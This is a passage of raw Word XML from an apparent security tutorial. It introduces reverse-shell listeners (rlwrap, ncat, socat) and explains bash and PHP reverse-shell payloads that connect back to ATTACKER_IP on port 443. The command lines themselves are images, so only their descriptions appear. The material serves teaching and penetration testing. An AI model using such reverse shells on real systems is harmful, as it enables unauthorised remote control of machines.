        <w:t xml:space="preserve"> is not the only utility that will allow us to do that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357AA2AA" w14:textId="77777777" w:rsidR="00AD5EFE" w:rsidRPr="00AD5EFE" w:rsidRDefault="00AD5EFE" w:rsidP="00AD5EFE">
      <w:r w:rsidRPr="00AD5EFE">
        <w:t>Let's explore some tools that can be used as listeners to interact with an incoming shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBF1459" w14:textId="77777777" w:rsidR="00AD5EFE" w:rsidRPr="00AD5EFE" w:rsidRDefault="00AD5EFE" w:rsidP="001F3D1E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD5EFE">
        <w:t>Rlwrap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="040EE9DA" w14:textId="2F85D75D" w:rsidR="00AD5EFE" w:rsidRPr="00AD5EFE" w:rsidRDefault="00AD5EFE" w:rsidP="00AD5EFE">
      <w:r w:rsidRPr="00AD5EFE">
        <w:br/>
        <w:t xml:space="preserve">It is a small utility that uses the GNU </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD5EFE">
        <w:t>readline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD5EFE">
        <w:t xml:space="preserve"> library to provide editing keyboard and history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2E1341" w14:textId="77777777" w:rsidR="00AD5EFE" w:rsidRPr="00AD5EFE" w:rsidRDefault="00AD5EFE" w:rsidP="00AD5EFE">
      <w:r w:rsidRPr="00AD5EFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Usage Example (Enhancing a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD5EFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD5EFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Shell With </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD5EFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rlwrap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD5EFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E42E80A" w14:textId="3EA64CB3" w:rsidR="00FF1FFE" w:rsidRDefault="001F3D1E" w:rsidP="00FF1FFE">
      <w:r w:rsidRPr="001F3D1E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CD9554F" wp14:editId="2B3AD513">
            <wp:extent cx="5731510" cy="496570"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="94520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05499" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="496570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB034BF" w14:textId="7BD24D09" w:rsidR="001F3D1E" w:rsidRDefault="00D96239" w:rsidP="00FF1FFE">
      <w:r w:rsidRPr="00D96239">
        <w:t>This wraps </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D96239">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D96239">
        <w:t> with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D96239">
        <w:t>rlwrap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D96239">
        <w:t>, allowing the use of features like arrow keys and history for better interaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50141EA7" w14:textId="77777777" w:rsidR="002F5C59" w:rsidRPr="002F5C59" w:rsidRDefault="002F5C59" w:rsidP="002F5C59">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F5C59">
        <w:lastRenderedPageBreak/>
        <w:t>Ncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2EE8BC78" w14:textId="77777777" w:rsidR="002F5C59" w:rsidRPr="002F5C59" w:rsidRDefault="002F5C59" w:rsidP="002F5C59">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F5C59">
        <w:t>Ncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F5C59">
        <w:t xml:space="preserve"> is an improved version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F5C59">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F5C59">
        <w:t xml:space="preserve"> distributed by the NMAP project. It provides extra features, like encryption (SSL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3193233B" w14:textId="6D859341" w:rsidR="002F5C59" w:rsidRDefault="002F5C59" w:rsidP="002F5C59">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F5C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Usage Example (Listening for Reverse Shells)</w:t>
      </w:r>
      <w:r w:rsidR="003C7CB1" w:rsidRPr="003C7CB1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C7CB1" w:rsidRPr="003C7CB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="431F6569" wp14:editId="481EBDCB">
            <wp:extent cx="5731510" cy="1013460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="160441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15393" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1013460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA28B7D" w14:textId="0F73DA40" w:rsidR="00761722" w:rsidRDefault="00761722" w:rsidP="002F5C59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00761722">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Usage Example (Listening for Reverse Shells with SSL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12500EDD" w14:textId="59CEF2C3" w:rsidR="00761722" w:rsidRDefault="00761722" w:rsidP="002F5C59">
      <w:r w:rsidRPr="00761722">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73441B9F" wp14:editId="3D66EABB">
            <wp:extent cx="5731510" cy="1015365"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="204196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65611" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1015365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4009C8" w14:textId="4FE6B08B" w:rsidR="006E44BC" w:rsidRDefault="006E44BC" w:rsidP="002F5C59">
      <w:r w:rsidRPr="006E44BC">
        <w:t>The --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E44BC">
        <w:t>ssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E44BC">
        <w:t> option enables SSL encryption for the listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A47EB6F" w14:textId="77777777" w:rsidR="00904B5F" w:rsidRPr="00904B5F" w:rsidRDefault="00904B5F" w:rsidP="00904B5F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00904B5F">
        <w:t>Socat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="141FE774" w14:textId="77777777" w:rsidR="00904B5F" w:rsidRPr="00904B5F" w:rsidRDefault="00904B5F" w:rsidP="00904B5F">
      <w:r w:rsidRPr="00904B5F">
        <w:t>It is a utility that allows you to create a socket connection between two data sources, in this case, two different hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737C97AB" w14:textId="67844700" w:rsidR="00904B5F" w:rsidRDefault="00904B5F" w:rsidP="002F5C59">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00904B5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Default Usage Example (Listening for Reverse Shell):</w:t>
      </w:r>
      <w:r w:rsidR="00DB3D5D" w:rsidRPr="00DB3D5D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB3D5D" w:rsidRPr="00DB3D5D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7647B9FE" wp14:editId="19514288">
            <wp:extent cx="5731510" cy="915035"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="39931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9308" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="915035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0FD618" w14:textId="77777777" w:rsidR="00277A50" w:rsidRDefault="00277A50" w:rsidP="002F5C59">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ACB6E46" w14:textId="44E25A34" w:rsidR="00277A50" w:rsidRDefault="00277A50" w:rsidP="00277A50">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00277A50">
        <w:t>Shell Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63323E73" w14:textId="77777777" w:rsidR="00AF6E86" w:rsidRPr="00AF6E86" w:rsidRDefault="00AF6E86" w:rsidP="00AF6E86">
      <w:r w:rsidRPr="00AF6E86">
        <w:t>A Shell Payload can be a command or script that exposes the shell to an incoming connection in the case of a bind shell or a send connection in the case of a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19929E8B" w14:textId="77777777" w:rsidR="00AF6E86" w:rsidRPr="00AF6E86" w:rsidRDefault="00AF6E86" w:rsidP="00AF6E86">
      <w:r w:rsidRPr="00AF6E86">
        <w:t>Let's explore some of these payloads that can be used in the Linux OS to expose the shell through the most popular </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6E86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reverse shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6E86">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D8E907" w14:textId="77777777" w:rsidR="00AF6E86" w:rsidRPr="00AF6E86" w:rsidRDefault="00AF6E86" w:rsidP="00A8604D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF6E86">
        <w:t>Bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247083AB" w14:textId="77777777" w:rsidR="00AF6E86" w:rsidRPr="00AF6E86" w:rsidRDefault="00AF6E86" w:rsidP="00A8604D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF6E86">
        <w:t>Normal Bash Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2525D25D" w14:textId="2EDE211C" w:rsidR="00277A50" w:rsidRDefault="008E6646" w:rsidP="00277A50">
      <w:r w:rsidRPr="008E6646">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AA8EB1E" wp14:editId="3A2218FC">
            <wp:extent cx="5731510" cy="494665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="68587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72585" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="494665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5F41E2" w14:textId="28348746" w:rsidR="00CF711E" w:rsidRDefault="00AC10FF" w:rsidP="00277A50">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00CF711E" w:rsidRPr="00CF711E">
        <w:t>his reverse shell initiates an interactive bash shell that redirects input and output through a TCP connection to the attacker's IP (</w:t>
      </w:r>
      <w:r w:rsidR="00CF711E" w:rsidRPr="00CF711E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ATTACKER_IP</w:t>
      </w:r>
      <w:r w:rsidR="00CF711E" w:rsidRPr="00CF711E">
        <w:t>) on port 443. The &gt;&amp; operator combines both standard output and standard error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CA0130" w14:textId="2D56F6A7" w:rsidR="0004494F" w:rsidRDefault="0004494F" w:rsidP="00ED3A14">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="0004494F">
        <w:t>Bash Read Line Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162C08B2" w14:textId="6EAD64C7" w:rsidR="00691DB6" w:rsidRDefault="0097688B" w:rsidP="00691DB6">
      <w:r w:rsidRPr="0097688B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D00162A" wp14:editId="4BA59A37">
            <wp:extent cx="5731510" cy="436245"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="208169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97977" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="436245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CECE3E" w14:textId="2D9AFF3A" w:rsidR="0097688B" w:rsidRDefault="0097688B" w:rsidP="00691DB6">
      <w:r w:rsidRPr="0097688B">
        <w:t>This reverse shell creates a new file descriptor (5 in this case)  and connects to a TCP socket. It will read and execute commands from the socket, sending the output back through the same socket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BF2FD4" w14:textId="3D3F8E62" w:rsidR="00390F2C" w:rsidRDefault="00390F2C" w:rsidP="00ED3A14">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00390F2C">
        <w:t>Bash With File Descriptor 196 Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138F1AFC" w14:textId="38C4709C" w:rsidR="0078323A" w:rsidRPr="0078323A" w:rsidRDefault="0078323A" w:rsidP="0078323A">
      <w:r w:rsidRPr="0078323A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6320D4DB" wp14:editId="3BA5C7D3">
            <wp:extent cx="5731510" cy="501650"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="214109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90665" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="501650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DC061A" w14:textId="133AA36E" w:rsidR="0078323A" w:rsidRDefault="0078323A" w:rsidP="0078323A">
      <w:r w:rsidRPr="0078323A">
        <w:t>This reverse shell uses a file descriptor (196 in this case) to establish a TCP connection. It allows the shell to read commands from the network and send output back through the same connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E25B438" w14:textId="3493E029" w:rsidR="00671C47" w:rsidRDefault="00142962" w:rsidP="0078323A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00142962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bash With File Descriptor 5 Reverse Shell</w:t>
      </w:r>
      <w:r w:rsidR="00740501" w:rsidRPr="00740501">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="280B65C7" wp14:editId="7EC94A41">
            <wp:extent cx="5731510" cy="474345"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="135933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0267" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="474345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D25ED3" w14:textId="19FF9ED7" w:rsidR="00B3475C" w:rsidRDefault="00B3475C" w:rsidP="0078323A">
      <w:r w:rsidRPr="00B3475C">
        <w:t>Similar to the first example, this command opens a shell (bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B3475C">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B3475C">
        <w:t>), but it uses file descriptor 5 for input and output, enabling an interactive session over the TCP connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F359E17" w14:textId="77777777" w:rsidR="0046717E" w:rsidRDefault="0046717E" w:rsidP="0078323A"/>
    <w:p w14:paraId="57FB37E0" w14:textId="77777777" w:rsidR="0046717E" w:rsidRPr="0046717E" w:rsidRDefault="0046717E" w:rsidP="00B33124">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="0046717E">
        <w:t>PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5E01DC" w14:textId="77777777" w:rsidR="00362AE9" w:rsidRDefault="0046717E" w:rsidP="0029357D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="0046717E">
        <w:t>PHP Reverse Shell Using the exec Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9B7439" w14:textId="4187AF54" w:rsidR="0046717E" w:rsidRDefault="00BB481C" w:rsidP="00362AE9">
      <w:r w:rsidRPr="00BB481C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7124A34A" wp14:editId="75420A28">
            <wp:extent cx="5731510" cy="494665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="68179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98011" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="494665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D782AAE" w14:textId="67135B5C" w:rsidR="00CE4691" w:rsidRDefault="00CE4691" w:rsidP="00CE4691">
      <w:r w:rsidRPr="00CE4691">
        <w:t>This reverse shell creates a socket connection to the attacker's IP on port 443 and uses the exec function to execute a shell, redirecting standard input and output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1094BBE7" w14:textId="73DA5A9E" w:rsidR="00955ABC" w:rsidRPr="00CE4691" w:rsidRDefault="00054FE8" w:rsidP="0029357D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00054FE8">
        <w:t xml:space="preserve">PHP Reverse Shell Using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00054FE8">
        <w:t>shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00054FE8">
        <w:t xml:space="preserve"> Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6D2510" w14:textId="5133276A" w:rsidR="002F5C59" w:rsidRDefault="0030471C" w:rsidP="00FF1FFE">
      <w:r w:rsidRPr="0030471C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="327BFAC1" wp14:editId="2EEA2F2B">
            <wp:extent cx="5731510" cy="505460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="94211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11931" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="505460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC3616F" w14:textId="311E2E35" w:rsidR="00EF5421" w:rsidRDefault="00EF5421" w:rsidP="00FF1FFE">
      <w:r w:rsidRPr="00EF5421">
        <w:t>Similar to the previous command, but uses the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF5421">
        <w:t>shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF5421">
        <w:t> function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D26F00" w14:textId="77219573" w:rsidR="006173EE" w:rsidRDefault="006173EE" w:rsidP="00655BA6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="006173EE">
        <w:t>PHP Reverse Shell Using the system Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3913539A" w14:textId="38D3F217" w:rsidR="00655BA6" w:rsidRDefault="008C2AC0" w:rsidP="00655BA6">
      <w:r w:rsidRPr="008C2AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35FB31B3" wp14:editId="6475F71E">
            <wp:extent cx="5731510" cy="527050"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="206831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11591" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="527050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFE5132" w14:textId="2DB6D5F8" w:rsidR="00EC6828" w:rsidRDefault="00EC6828" w:rsidP="00655BA6">
      <w:r w:rsidRPr="00EC6828">
        <w:lastRenderedPageBreak/>
        <w:t>This reverse shell employs the system function, which executes the command and outputs the result to the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF5D300" w14:textId="0C33AACF" w:rsidR="002F3F11" w:rsidRDefault="002F3F11" w:rsidP="001E37BD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="002F3F11">
        <w:t xml:space="preserve">PHP Reverse Shell Using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3F11">
        <w:t>passthru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3F11">
        <w:t xml:space="preserve"> Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1BD56F" w14:textId="2C71E454" w:rsidR="001E37BD" w:rsidRDefault="00E11D2B" w:rsidP="001E37BD">
      <w:r w:rsidRPr="00E11D2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28513F30" wp14:editId="6C1508B4">
            <wp:extent cx="5731510" cy="502920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="40564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43187" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="502920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
